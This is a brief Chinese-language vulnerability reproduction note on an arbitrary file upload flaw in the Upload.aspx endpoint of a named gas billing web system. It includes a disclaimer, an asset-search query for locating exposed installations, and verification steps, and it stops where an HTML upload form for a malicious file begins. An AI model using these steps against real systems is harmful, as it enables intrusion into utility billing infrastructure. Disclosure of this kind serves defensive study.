漏洞描述

/AjaxService/Upload.aspx 存在任意文件上傳漏洞

免責(zé)聲明

技術(shù)文章僅供參考，任何個人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律，遵守公共秩序，尊重社會公德，不得利用網(wǎng)絡(luò)從事危害國家安全、榮譽和利益，未經(jīng)授權(quán)請勿利用文章中的技術(shù)資料對任何計算機系統(tǒng)進行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失，均由使用者本人負(fù)責(zé)。本文所提供的工具僅用于學(xué)習(xí)，禁止用于其他！！

漏洞集合

【傳送點】上千漏洞復(fù)現(xiàn)復(fù)現(xiàn)集合 exp poc 持續(xù)更新

資產(chǎn)確定

app="先鋒WEB燃?xì)馐召M系統(tǒng)"

漏洞復(fù)現(xiàn)

訪問http://ip:port/AjaxService/Upload.aspx驗證

出現(xiàn)上面頁面則證明漏洞存在
使用html網(wǎng)頁來上傳惡意文件

<!DOCTYPE html><html><head><meta